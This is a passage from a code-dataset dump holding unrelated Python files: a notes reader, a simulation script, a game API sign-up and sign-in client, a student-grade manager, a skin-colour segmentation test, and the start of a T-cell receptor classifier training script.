glob.glob(dir_path_pattern)\n\ndef get_all_posts():\n \"\"\"Get all posts files info. 
return an array of dictionary\n {\n \"title\": \"Day 001\",\n \"path\": \"/2016-04-01-day001-zh.md\"\n }\n \"\"\"\n \n files_path_list = get_all_file_path_start_from(\"./static/notes/*\")\n\n output = []\n \n for file_path in files_path_list:\n file_detail = {\n \"title\": file_path.split(\"/\")[-1],\n \"path\": file_path\n }\n output.append(file_detail)\n\n return output\n\ndef get_note_content_with_filename(filename):\n \"\"\"Return the full content of note with given filename\n \"\"\"\n output = \"\"\n\n file_path = \"./static/notes/\" + filename\n \n if os.path.isfile(file_path):\n with open(file_path) as file:\n for line in file:\n output += line + \"\\n\"\n return output\n else:\n return \"File Not Found\"\n \n","sub_path":"XYToolBox.py","file_name":"XYToolBox.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"566455141","text":"import warnings\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pylab as plt\n\nfrom python.sim import *\nfrom python.fileDump import *\nfrom python.raw_data import *\nimport re\nimport time\n\nwarnings.filterwarnings(\"error\")\n\nimport numpy as np\nimport pdb\nimport os \n\nif __name__ == '__main__':\n EXCHANGEABLE=[]\n NORM_SIG=False\n RAT=False\n MOUSE=True\n CROSS_N=None#'iid-ggnull-ghc'\n \n parms={\n 'Types':['hc','gnull','bj','fdr','minP','score','ggnull','ghc'],\n 'plot':True,\n 'H0':50000,\n 'H01':30000,\n 'H1':30000,\n 'fontsize':17,\n 'new':True\n }\n \n if len(EXCHANGEABLE)>0:\n for N in [500,1000,1500,2000,2500,3000,3500,4000,4500,5000]:\n for rho in EXCHANGEABLE: \n sig,_=exchangeable(N,rho)\n sigName='iid-ggnull-ghc-'+str(N)\n \n fileDump(sim({**parms,'sigName':sigName,'N':N,'sig':sig,'muRange':np.unique(np.linspace(2,3,10)).round(3),\n 'epsRange':np.unique(np.linspace(2,N*(.008 if N>2000 else .01 if N>1000 else .017),10).round()).astype(int)}))\n\n if NORM_SIG:\n N=1000\n sig,sigName=norm_sig(N,1.1)\n fileDump(sim(N,H0,H1,sigName,sig,delta))\n\n sig,sigName=norm_sig(N,1.2)\n fileDump(sim(N,H0,H1,sigName,sig,delta))\n\n sig,sigName=norm_sig(N,1.3)\n fileDump(sim(N,H0,H1,sigName,sig,delta))\n\n if MOUSE:\n for N in [500,1000,1500,2000,2500,3000,3500,4000,4500,5000,5500,6000,6500,7000,7500,8000,8500,9000,10000]:\n sig=raw_data('../../data/pre_pca_hip_mouse.csv',N)\n sigName='mouse'+str(N)\n\n fileDump(sim({**parms,'sigName':sigName,'N':N,'sig':sig,'muRange':np.unique(np.linspace(2,3,10)).round(3),\n 'epsRange':np.unique(np.linspace(2,N*(.008 if N>2000 else .01 if N>1000 else .017),10).round()).astype(int)}))\n\n if RAT:\n N=200\n sig,sigName=raw_data('rat.csv','rat',N)\n fileDump(sim(N,H0,H1,sigName,sig,mu_delta,eps_frac,Run))\n \n if CROSS_N is not None:\n sigName=CROSS_N\n H1=parms['H1']\n \n power=pd.DataFrame()\n \n fileList=[(y.group(0),int(y.group(1))) for x in os.listdir() for y in [re.search(\n '../raw/raw-power-'+sigName+'-([0-9]+).csv',x)] if y is not None]\n for name,N in fileList:\n tmp=pd.read_csv(name).reset_index(drop=True)\n power=power.append(tmp.merge(pd.DataFrame([N]*len(tmp),index=range(len(tmp)),columns=['N']),left_index=True,\n right_index=True))\n\n nPlot(power,H1,sigName) \n ","sub_path":"ail/oldPython/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"536844374","text":"import requests\r\nimport config\r\nimport crypto\r\nimport json\r\nimport random\r\n\r\ndef register(ver, os, ad = 
None, unique = None, key = None):\r\n if os == 'android':\r\n dn = config.device_name1\r\n dm = config.device_model1\r\n dv = config.device_ver1\r\n dua = config.device_agent1\r\n else:\r\n dn = config.device_name2\r\n dm = config.device_model2\r\n dv = config.device_ver2\r\n dua = config.device_agent2\r\n if ver == 'gb':\r\n url = config.gb_url + '/auth/sign_up'\r\n code = config.gb_code\r\n else:\r\n url = config.jp_url + '/auth/sign_up'\r\n code = config.jp_code\r\n headers = {\r\n 'Accept': '*/*',\r\n 'Content-Type': 'application/json',\r\n 'X-Platform': os,\r\n 'X-ClientVersion': code,\r\n 'X-Language': config.lang,\r\n 'User-Agent': dua\r\n }\r\n data = None\r\n acc_ad = None\r\n acc_unique = None\r\n if ad != None and unique != None and key != None:\r\n user_acc = {\r\n 'ad_id': ad,\r\n 'country': config.country,\r\n 'currency': config.currency,\r\n 'device': dn,\r\n 'device_model': dm,\r\n 'os_version': dv,\r\n 'platform': os,\r\n 'unique_id': unique\r\n }\r\n data = {'captcha_session_key': key, 'user_account': user_acc}\r\n else:\r\n unique = crypto.guid()\r\n acc_ad = unique[0]\r\n acc_unique = unique[1]\r\n user_acc = {\r\n 'ad_id': unique[0],\r\n 'country': config.country,\r\n 'currency': config.currency,\r\n 'device': dn,\r\n 'device_model': dm,\r\n 'os_version': dv,\r\n 'platform': os,\r\n 'unique_id': unique[1]\r\n }\r\n data = {'user_account': user_acc}\r\n r = requests.post(url, data=json.dumps(data), headers=headers)\r\n return [r.json(), acc_ad, acc_unique]\r\n\r\ndef login(ver, os, basic, first, key = None):\r\n if os == 'android':\r\n dn = config.device_name1\r\n dm = config.device_model1\r\n dv = config.device_ver1\r\n dua = config.device_agent1\r\n else:\r\n dn = config.device_name2\r\n dm = config.device_model2\r\n dv = config.device_ver2\r\n dua = config.device_agent2\r\n if ver == 'gb':\r\n url = config.gb_url + '/auth/sign_in'\r\n if first:\r\n code = '////'\r\n else:\r\n code = config.gb_code\r\n else:\r\n url = config.jp_url + '/auth/sign_in'\r\n if first:\r\n code = config.jp_code\r\n else:\r\n code = config.jp_code\r\n headers = {\r\n 'Accept': '*/*',\r\n 'Authorization': 'Basic ' + str(basic),\r\n 'Content-Type': 'application/json',\r\n 'X-UserCountry': config.country,\r\n 'X-UserCurrency': config.currency,\r\n 'X-Platform': os,\r\n 'X-ClientVersion': code,\r\n 'X-Language': config.lang,\r\n 'User-Agent': dua\r\n }\r\n if key != None:\r\n data = {'captcha_session_key': key, 'ad_id': config.ad, 'unique_id': config.uuid}\r\n else:\r\n data = {'ad_id': config.ad, 'unique_id': config.uuid}\r\n r = requests.post(url, data=json.dumps(data), headers=headers)\r\n return r.json()","sub_path":"api/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":3216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"145469455","text":"#한글 줄맞춤 출력을 위한 unicode\r\nimport unicodedata\r\n#cmd_list : 명령어의 종류\r\ncmd_list = ['A', 'D', 'F', 'M', 'P', 'R', 'S', 'Q', 'W']\r\n#db_attribute : 데이터의 속성명칭\r\ndb_attribute = ['일련번호', '학생 id', '이름', '생년월일', '중간고사', '기말고사', '평균', 'Grade']\r\n#db_data : 실질적인 데이터, 각 사람별로 nested list 형식으로 저장됨, 생년월일은 모두 각각 따로 저장됨\r\ndb_data = []\r\n\r\ndef preformat_cjk (string, width, align='>', fill=' '):\r\n count = (width - sum(1 + (unicodedata.east_asian_width(c) in \"WF\")\r\n for c in string))\r\n return {\r\n '>': lambda s: fill * count + s,\r\n '<': lambda s: s + fill * count,\r\n '^': lambda s: fill * (count / 2)\r\n + s\r\n + fill * (count / 2 + count % 
2)\r\n}[align](string)\r\n\r\n\r\n\r\n#생년월일 체크를 위한 윤년 계산기\r\ndef leap_year(year):\r\n if (year%4==0 and year%100!=0) or year%400==0:\r\n return True\r\n return False\r\n\r\n\r\n#올바른 생년월일인지 판별하는 함수\r\ndef valid_date(y,m,d):\r\n cal = [31,28,31,30,31,30,31,31,30,31,30,31]\r\n if y<0:\r\n return False\r\n if m<0 or m>12:\r\n return False\r\n if d<0 or (leap_year(y) and m==2 and d>29) or (leap_year(y) and m!=2 and d>cal[m-1]) or ((not leap_year(y)) and d>cal[m-1]):\r\n return False\r\n return True\r\n\r\n\r\n#파일의 포멧이 잘못되었을때 에러를 출력하는 함수\r\ndef print_format_error(num, chk):\r\n print(f\"file format error in {db_attribute[chk]} on line {num}!\")\r\n\r\n\r\n#파일의 데이터가 잘못되었을때 에러를 출력하는 함수\r\ndef print_data_error(num, chk):\r\n print(f\"file data error in {db_attribute[chk]} on line {num}!\")\r\n\r\n \r\n#파일의 한줄을 파싱하는 함수\r\ndef parse_file(num, line): \r\n temp = []\r\n chk = 0\r\n try: \r\n temp.append(int(line[0])); chk+=1 \r\n temp.append(str(line[1])); chk+=1 \r\n temp.append(str(line[2])); chk+=1 \r\n temp.append(int(line[3].split('-')[0]))\r\n temp.append(int(line[3].split('-')[1]))\r\n temp.append(int(line[3].split('-')[2])); chk+=1 \r\n temp.append(int(line[4])); chk+=1 \r\n temp.append(int(line[5])); chk+=1 \r\n except:\r\n print_format_error(num, chk)\r\n return [-1]\r\n \r\n count = sum(1 + (unicodedata.east_asian_width(c) in \"WF\") for c in temp[1])\r\n if count>10:\r\n print(f\"Too long name! on line{num}\")\r\n return [-1]\r\n\r\n if not valid_date(temp[3], temp[4], temp[5]):\r\n print_data_error(num, 3)\r\n return [-1]\r\n\r\n if temp[6]<0 or temp[6]>100:\r\n print_data_error(num, 4)\r\n return [-1]\r\n\r\n if temp[7]<0 or temp[7]>100:\r\n print_data_error(num, 5)\r\n return [-1]\r\n\r\n temp.append((temp[6] + temp[7]) / 2)\r\n if temp[8]>=90:\r\n temp.append('A')\r\n elif temp[8]>=70:\r\n temp.append('B')\r\n elif temp[8]>=50:\r\n temp.append('C')\r\n elif temp[8]>=30:\r\n temp.append('D')\r\n else :\r\n temp.append('F')\r\n\r\n return temp\r\n#파일 전체를 읽는 함수\r\ndef read_file(filename):\r\n f_data = result = [] \r\n global db_data\r\n try:\r\n with open(filename, 'r') as f:\r\n f_data = f.readlines()\r\n except:\r\n print('Could not open file.')\r\n else:\r\n for num, i in zip(range(len(f_data)), f_data): \r\n line = parse_file(num+1, i.replace('\\n',\"\").split('\\t')) \r\n if line==[-1]:\r\n return [-1]\r\n else:\r\n if str(line[1]) in list(x[1] for x in result):\r\n print(f\"student ID is doubled in {num+1}\")\r\n return [-1]\r\n result.append(line)\r\n db_data = result\r\n\r\n# 최초 파일 DB update(by bong)\r\n# read_file() r을 통한 명시적 읽기 필요(by jang)\r\n\r\n# for 'cmd M' function(by bong)\r\ndef find_in_sublists(lst, value):\r\n for sub_i, sublist in enumerate(lst):\r\n try:\r\n global f_M\r\n f_M= [sub_i, sublist.index(value)]\r\n return f_M\r\n except ValueError:\r\n pass\r\n\r\n raise ValueError('%s is not in lists' % value)\r\n\r\n#사용자로부터 적합한 명령 입력을 요구하는 함수\r\ndef input_cmd():\r\n while True:\r\n try:\r\n x = str(input(\"Choose one of the options below : \")).upper()\r\n except:\r\n print(\"Wrong input\\n\")\r\n continue\r\n if x in cmd_list:\r\n return x\r\n print(\"Wrong input\\n\")\r\n\r\n#!!!각 명령별 작업 코드!!!!\r\ndef pcs_a(): \r\n global db_data\r\n while True:\r\n try:\r\n addid = str(input(\"Input Add student ID : \"))\r\n if int(addid)>0 and int(addid)<99999999:\r\n if addid in list(x[1] for x in db_data):\r\n print(\"student ID is in use\")\r\n else:\r\n addid = addid\r\n break\r\n else:\r\n print(\"student ID should be in format of ########\")\r\n except:\r\n print(\"student ID 
should be in format of ########\")\r\n\r\n \r\n while True:\r\n try:\r\n addname = str(input(\"Input Add student name : \")) \r\n count = sum(1 + (unicodedata.east_asian_width(c) in \"WF\") for c in addname)\r\n print(count)\r\n if count<=10: \r\n break\r\n print(\"The name is too long\")\r\n except:\r\n print(\"Error\")\r\n\r\n while True:\r\n try:\r\n addbirthyear = int(input(\"Input Add student Year Of Birth : \"))\r\n addbirthmonth = int(input(\"Input Add student Month Of Birth : \"))\r\n addbirthday = int(input(\"Input Add student Day Of Birth : \")) \r\n if valid_date(addbirthyear, addbirthmonth, addbirthday):\r\n break\r\n except:\r\n print(\"Please input valid date\")\r\n print(\"Plase input valid date\")\r\n\r\n while True:\r\n try:\r\n addmid = int(input(\"Input Add student midscore : \"))\r\n if addmid>=0 and addmid<=100:\r\n break\r\n except:\r\n print(\"Please input number\")\r\n print(\"out of score range 0~100\")\r\n while True:\r\n try:\r\n addfinal = int(input(\"Input Add student finalscore : \"))\r\n if addfinal>=0 and addfinal<=100:\r\n break\r\n except:\r\n print(\"Please input number\")\r\n print(\"out of score range 0~100\")\r\n\r\n index = len(db_data)+1\r\n\r\n values = [index, addid,addname,addbirthyear,addbirthmonth,addbirthday,addmid,addfinal,(addmid+addfinal)/2]\r\n if values[8]>=90:\r\n values.append('A')\r\n elif values[8]>=70:\r\n values.append('B')\r\n elif values[8]>=50:\r\n values.append('C')\r\n elif values[8]>=30:\r\n values.append('D')\r\n else :\r\n values.append('F')\r\n db_data.append(values)\r\n\r\ndef pcs_d():\r\n print(\"Process D\")\r\n del_idORname=str(input(\"Enter the id or name that you want to delete student : \"))\r\n del1 = find_in_sublists(db_data,del_idORname)\r\n del2 = del1[0]\r\n a = db_data[del2]\r\n while True:\r\n try :\r\n input_d = int(input(\"정말로 삭제하시겠습니까?(1.네, 2.아니오) : \"))\r\n except :\r\n print(\"Input Error!\")\r\n continue\r\n else :\r\n if input_d in [1,2]:\r\n break \r\n print(\"1 이나 2의 숫자만 선택 가능합니다.\")\r\n if input_d == 1:\r\n db_data.remove(a)\r\n print(\"삭제되었습니다\")\r\n else:\r\n print(\"취소되었습니다\")\r\n \r\n for n in range(len(db_data)):\r\n db_data[n][0] = n+1\r\n \r\ndef pcs_f():\r\n print(\"Process F\")\r\n while True:\r\n try:\r\n f_idORname=str(input(\"Enter the id or name that you want to find student : \"))\r\n f1 = find_in_sublists(db_data,f_idORname)\r\n f2 = f1[0]\r\n find_target = db_data[f2]\r\n print(f\"해당학생의 중간, 기말 평균점수는 {find_target[8]}이고 등급은 {find_target[9]} 입니다\")\r\n break\r\n except ValueError:\r\n print(\"Oops! That was no data. Try again...\")\r\n continue\r\n \r\n# modify (by bong)\r\ndef pcs_m():\r\n print(\"Process M\")\r\n modify_idORname=str(input(\"Enter the id or name that you want to modify score : \"))\r\n modify_ctg=input(\"1. 중간고사 \\n2. 
기말고사 \\nEnter the number you want to modify score : \")\r\n modify_score=int(input(\"Enter the score you want to input : \"))\r\n while (modify_idORname not in [j for i in db_data for j in i]):\r\n print(\"Your first input data is not right\")\r\n break\r\n find_in_sublists(db_data,modify_idORname)\r\n if modify_ctg in [\"1\",\"2\"]:\r\n if modify_ctg==\"1\":\r\n modify_ctg_idx=6\r\n else:\r\n modify_ctg_idx=7\r\n else:\r\n print(\"Your second input data is not right\")\r\n db_data[f_M[0]][modify_ctg_idx]=modify_score\r\n for i in db_data:\r\n print(i)\r\n# # print (by bong)\r\ndef pcs_p(data):\r\n if data==[]:\r\n print(\"No Data!\")\r\n else:\r\n print(\"일련번호 학생id 이름 생년월일 중간고사 기말고사 평 균 등급 \")\r\n for i in data: \r\n print(f\" {i[0]:<3} {i[1]:>12} {preformat_cjk(i[2],10)} {i[3]:>8}-{i[4]:02d}-{i[5]:02d} {i[6]:>7} {i[7]:>11} {i[8]:12.1f} {i[9]:>6}\")\r\n \r\n\r\n# read (by bong) 파일내용이 [순번, id, 이름, 생년월일]로 구성\r\ndef pcs_r():\r\n print(\"Process R\")\r\n x=str(input(\"Enter the file name : \"))\r\n if x==\"\":\r\n print(\"Read file by default name : data.txt\")\r\n x = \"data.txt\"\r\n read_file(x)\r\n\r\ndef pcs_s():\r\n print(\"Process s\")\r\n while True:\r\n try :\r\n input_a = int(input(\"정렬 기준을 선택해주세요(1.이름, 2.평균점수, 3.Grade) : \"))\r\n except :\r\n print(\"Input Error!\")\r\n continue\r\n else :\r\n if input_a in [1,2,3]:\r\n break \r\n print(\"1 ~ 3번까지 숫자만 선택 가능합니다.\")\r\n if input_a == 1:\r\n print(\"************************************이름순으로 정렬하겠습니다.************************************\")\r\n sorted_data = sorted(db_data, key = lambda x : x[2])\r\n pcs_p(sorted_data)\r\n elif input_a ==2:\r\n print(\"************************************평균점수순으로 정렬하겠습니다.************************************\")\r\n sorted_data = sorted(db_data, key = lambda x : x[8],reverse=True)\r\n pcs_p(sorted_data)\r\n elif input_a==3:\r\n print(\"************************************Grade순으로 정렬하겠습니다.***********************************\")\r\n sorted_data = sorted(db_data, key = lambda x : x[8],reverse=True)\r\n pcs_p(sorted_data)\r\n \r\ndef pcs_q():\r\n print(\"Process Q\")\r\n print(\"Bye!\")\r\ndef pcs_w():\r\n print(\"Process W\")\r\n try:\r\n with open('report.txt', 'w') as f2:\r\n print(\"***********************************************성 적 표***********************************************\", file = f2)\r\n print(\" 일련번호 학생id 이름 생년월일 중간고사 기말고사 평 균 등급 \", file = f2)\r\n for i in range(len(db_data)): \r\n print(\" {:>4} {:^10} {} {}.{:>3}.{:>3} {:>6} {:>6} {:.1f} {:>8}\"\r\n .format(db_data[i][0], db_data[i][1], db_data[i][2], db_data[i][3], db_data[i][4],db_data[i][5],db_data[i][6],db_data[i][7],db_data[i][7],db_data[i][7]), file = f2)\r\n print(\"The file has been saved to 'report.txt'.\")\r\n except:\r\n print('Could not save file.')\r\nwhile True:\r\n cmd = input_cmd()\r\n if cmd == 'A':\r\n pcs_a()\r\n elif cmd == 'D':\r\n pcs_d()\r\n elif cmd == 'F':\r\n pcs_f()\r\n elif cmd == 'M':\r\n pcs_m()\r\n elif cmd == 'P':\r\n pcs_p(db_data)\r\n elif cmd == 'R':\r\n pcs_r()\r\n elif cmd == 'S':\r\n pcs_s()\r\n elif cmd == 'Q':\r\n break\r\n elif cmd == 'W':\r\n pcs_w()\r\n print('')\r\n\r\n","sub_path":"project_bum_final.py","file_name":"project_bum_final.py","file_ext":"py","file_size_in_byte":12354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"322063297","text":"\"\"\"\nhttps://ieeexplore.ieee.org/document/7783247\nSkin Color Segmentation Using\nMulti-Color Space Threshold\n1Romi Fadillah Rahmat, 2Tengku Chairunnisa, 3Dani Gunawan, 4Opim Salim 
Sitompul\n1,2,3Department of Information Technology\nFaculty of Computer Science and Information Technology\nUniversity of Sumatera Utara\nMedan, Indonesia\n1romi.fadillah@usu.ac.id\n2tengku.chairunnisa@students.usu.ac.id\n3danigunawan@usu.ac.id\n4opim@usu.ac.id\n978-1-5090-2549-7/16/$31.00 ©2016 IEEE\nSkin Color Segmentation Using\nMulti-Color Space Threshold\n\"\"\"\n\n# https://nalinc.github.io/blog/2018/skin-detection-python-opencv/\n\n# Required modules\nimport cv2\nimport imutils\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom utils.hsv_rgb_ycrcb import Skin_Detect\nfrom utils.ImageUtils import ImgUtils\n\n\nclass SkinTrimUtilsTestByStep:\n _sd = Skin_Detect()\n\n COLOR_SPACE_RGB = 0\n COLOR_SPACE_HSV = 1\n COLOR_SPACE_YCrCb = 2\n COLOR_SPACE_Lab = 3\n COLOR_SPACE_RGB_HSV_YCrCb = 4\n\n @staticmethod\n def getMaskAndResult(image, colorType=COLOR_SPACE_RGB_HSV_YCrCb):\n if colorType == SkinTrimUtilsTestByStep.COLOR_SPACE_RGB_HSV_YCrCb:\n mask = SkinTrimUtilsTestByStep._sd.RGB_H_CbCr(image, False)\n mask = mask.astype(np.uint8)\n mask *= 255\n # mask = SkinTrimUtilsTestByStep.erode(mask)\n # mask = SkinTrimUtilsTestByStep.dilate(mask)\n return mask\n elif colorType == SkinTrimUtilsTestByStep.COLOR_SPACE_RGB:\n pass\n\n elif colorType == SkinTrimUtilsTestByStep.COLOR_SPACE_Lab:\n pass\n\n elif colorType == SkinTrimUtilsTestByStep.COLOR_SPACE_HSV:\n pass\n\n elif colorType == SkinTrimUtilsTestByStep.COLOR_SPACE_YCrCb:\n pass\n\n\n @staticmethod\n def getColorSpaceMask(image, colorType=COLOR_SPACE_RGB_HSV_YCrCb):\n minRange = np.array([0, 0, 0], np.uint8)\n maxRange = np.array([255, 255, 255], np.uint8)\n if colorType == SkinTrimUtilsTestByStep.COLOR_SPACE_RGB_HSV_YCrCb:\n \"\"\"\n 数据来源:\n Nusirwan Anwar bin Abdul Rahman, Kit Chong Wei and John See†\n RGB-H-CbCr Skin Colour Model for Human Face Detection\n Faculty of Information Technology, Multimedia University\n johnsee@mmu.edu.my†\n :param image:\n :return:\n \"\"\"\n mask = SkinTrimUtilsTestByStep._sd.RGB_H_CbCr(image, False)\n mask = mask.astype(np.uint8)\n mask *= 255\n # mask = SkinTrimUtilsTestByStep.erode(mask)\n # mask = SkinTrimUtilsTestByStep.dilate(mask)\n return mask\n elif colorType == SkinTrimUtilsTestByStep.COLOR_SPACE_RGB:\n \"\"\"\n 数据来源:\n Available online at www.sciencedirect.com\n Manuel C. Sanchez-Cuevas, Ruth M. Aguilar-Ponce, J. Luis Tecpanecatl-Xihuitl\n A Comparison of Color Models for Color Face Segmentation\n 100 < R < 160, 80 < G <, 50 < B < 120\n :param img:\n :return:\n \"\"\"\n minRange = np.array([50, 80, 100], np.uint8)\n maxRange = np.array([120, 255, 160], np.uint8)\n elif colorType == SkinTrimUtilsTestByStep.COLOR_SPACE_Lab:\n \"\"\"\n 范围:\n This outputs 0≤L≤100, −127≤a≤127, −127≤b≤127 . The values are then converted to the destination data type:\n 8-bit images: L←L∗255/100,a←a+128,b←b+128\n L:0-180\n a:0-255\n b:0-255\n :param image:\n :return:\n \"\"\"\n minRange = np.array([0, 128, 127], np.uint8)\n maxRange = np.array([235, 143, 158], np.uint8)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2Lab)\n elif colorType == SkinTrimUtilsTestByStep.COLOR_SPACE_HSV:\n \"\"\"\n 色相是颜色模型的颜色部分,并表示为0到360度之间的数字。在OpenCV中为0-180。定义主色[R,Y,G,C,B,M]\n 饱和度是颜色中的灰色量,从0到100%。\n 值与饱和度结合使用,并描述颜色的亮度或强度(0%至100%)。\n\n 范围来源: Tsekeridou, S. and Pitas, I., “Facial feature extraction in frontal\n views using biometric analogie,” in 9th European Signal Processing\n Conference (EUSIPCO 1998), 1998, pp. 
1-4\n\n In previous research, Tsekeridou and Pitas [22] had\n selected pixels having skin color by setting thresholds as\n 换算关系:\n 8-bit images: V←255V,S←255S,H←H/2(to fit to 0 to 255)\n 标准:\n V >= 40,\n 0.2 < S < 0.6\n 0 < H < 25 OR 335< H < 360\n 转换成OpenCV\n V >= 40\n 51 < S < 153\n 0 < H < 13或者 177 < H < 180\n :param image:\n :return:\n \"\"\"\n # minRange = np.array([0, 51, 40], dtype=\"uint8\")\n # maxRange = np.array([13, 255, 255], dtype=\"uint8\")\n minRange = np.array([0, 0, 0], dtype=\"uint8\")\n maxRange = np.array([13, 255, 255], dtype=\"uint8\")\n image = cv2.cvtColor(image, cv2.COLOR_BGR2HLS)\n elif colorType == SkinTrimUtilsTestByStep.COLOR_SPACE_YCrCb:\n minRange = np.array([0, 133, 77], np.uint8)\n maxRange = np.array([255, 173, 127], np.uint8)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2YCrCb)\n\n mask = cv2.inRange(image, minRange, maxRange)\n # mask = SkinTrimUtilsTestByStep.erode(mask)\n # mask = SkinTrimUtilsTestByStep.dilate(mask)\n return mask\n\n @staticmethod\n def erode(skinMask):\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (11, 11))\n skinMask = cv2.erode(skinMask, kernel, iterations=1)\n return skinMask\n\n @staticmethod\n def dilate(skinMask):\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (11, 11))\n skinMask = cv2.dilate(skinMask, kernel, iterations=1)\n return skinMask\n\n @staticmethod\n def gaussianBlur(skinMask):\n skinMask = cv2.GaussianBlur(skinMask, (3, 3), 0)\n return skinMask\n\n\ndef testVideo():\n videoCapture = cv2.VideoCapture(1)\n while videoCapture.isOpened():\n # image = cv2.imread(\"../..\")\n flag, frame = videoCapture.read()\n if not flag:\n break\n frame = imutils.resize(frame, width=800)\n cv2.imshow('rgb', SkinTrimUtilsTestByStep.rgb(frame))\n cv2.imshow('hsv', SkinTrimUtilsTestByStep.hsv(frame))\n cv2.imshow('yCrCb', SkinTrimUtilsTestByStep.YCrCb(frame))\n cv2.imshow('lab', SkinTrimUtilsTestByStep.Lab(frame))\n cv2.imshow('rgb_hsv_ycbcr', SkinTrimUtilsTestByStep.rgb_hsv_ycbcr(frame))\n # cv2.imshow('melt', melt(frame))\n\n # Hit 'q' on the keyboard to quit!\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n videoCapture.release()\n cv2.destroyAllWindows()\n\n\ndef putTextTo(img, text):\n cv2.putText(img, text, (1, 20),\n cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255, 255, 255), cv2.LINE_4)\n\n\ndef showImage(frame, title=None):\n # frame = cv2.imread(\"../../faces/7.jpeg\")\n frame = imutils.resize(frame, width=300)\n cv2.imshow(\"original_\" + title, frame)\n melt = SkinTrimUtilsTestByStep.getColorSpaceMask(frame, SkinTrimUtilsTestByStep.COLOR_SPACE_RGB_HSV_YCrCb)\n putTextTo(melt, \"melt\")\n hsv = SkinTrimUtilsTestByStep.getColorSpaceMask(frame, SkinTrimUtilsTestByStep.COLOR_SPACE_HSV)\n putTextTo(hsv, \"hsv\")\n rgb = SkinTrimUtilsTestByStep.getColorSpaceMask(frame, SkinTrimUtilsTestByStep.COLOR_SPACE_RGB)\n putTextTo(rgb, \"rgb\")\n lab = SkinTrimUtilsTestByStep.getColorSpaceMask(frame, SkinTrimUtilsTestByStep.COLOR_SPACE_Lab)\n putTextTo(lab, \"lab\")\n ycrcb = SkinTrimUtilsTestByStep.getColorSpaceMask(frame, SkinTrimUtilsTestByStep.COLOR_SPACE_YCrCb)\n putTextTo(ycrcb, \"ycrcb\")\n # mask = np.hstack([melt, hsv, rgb, lab, ycrcb])\n mask = np.concatenate((melt, hsv, rgb, lab, ycrcb), axis=1)\n\n cv2.imshow(title, mask)\n\n\nvideoCapture = cv2.VideoCapture(1)\n\n\ndef testImage():\n showImage(cv2.imread(\"../../faces/7.jpeg\"), \"1\")\n showImage(cv2.imread(\"../../faces/white.jpg\"), \"2\")\n showImage(cv2.imread(\"../../faces/deepdark.jpg\"), \"3\")\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\ndef testVideo():\n 
while videoCapture.isOpened():\n ret, frame = videoCapture.read()\n if not ret:\n print(\"摄像头有问题!\")\n showImage(frame, \"1\")\n\n # Hit 'q' on the keyboard to quit!\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n videoCapture.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n # testVideo()\n testImage()\n","sub_path":"test/skin_test/SkinTrimTestByStepRealTime.py","file_name":"SkinTrimTestByStepRealTime.py","file_ext":"py","file_size_in_byte":8835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"307397283","text":"#!/usr/bin/env python3\n##########################################################################################\n# Author: Jared L. Ostmeyer\n# Date Started: 2019-01-28\n# Purpose: Train and validate model classifier for T-cell receptor sequences\n##########################################################################################\n\n##########################################################################################\n# Libraries\n##########################################################################################\n\nimport argparse\nimport os\nfrom dataset import *\nfrom model import *\nimport tensorflow as tf\nimport numpy as np\n\n##########################################################################################\n# Arguments\n##########################################################################################\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--database', help='Path to the database', type=str, required=True)\nparser.add_argument('--cohort_train', help='Name of the training cohort', type=str, required=True)\nparser.add_argument('--split_train', help='Name of the training samples', type=str, required=True)\nparser.add_argument('--cohort_val', help='Name of the validation cohort', type=str, required=True)\nparser.add_argument('--split_val', help='Name of the validation samples', type=str, required=True)\nparser.add_argument('--output', help='Output basename', type=str, required=True)\nparser.add_argument('--path_shuffle_train', help='Path where CSV file will store shuffled data', type=str, default=None)\nparser.add_argument('--path_shuffle_val', help='Path where CSV file will store shuffled data', type=str, default=None)\n\nparser.add_argument('--gpu', help='GPU ID', type=int, default=0)\n\nargs = parser.parse_args()\n\n##########################################################################################\n# Environment\n##########################################################################################\n\nos.environ['CUDA_VISIBLE_DEVICES'] = str(args.gpu)\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\n##########################################################################################\n# Load datasets\n##########################################################################################\n\n# Settings\n#\nmax_steps = 32\n\n# Load representation of the features\n#\naminoacids_dict = load_aminoacid_embedding_dict('../lib/atchley_factors_normalized.csv')\n\n# Load the samples\n#\nxs_train, ys_train, ws_train = load_dataset(\n args.database, args.cohort_train, args.split_train, aminoacids_dict, path_shuffle=args.path_shuffle_train\n)\nxs_val, ys_val, ws_val = load_dataset(\n args.database, args.cohort_val, args.split_val, aminoacids_dict, path_shuffle=args.path_shuffle_val\n)\n\n##########################################################################################\n# 
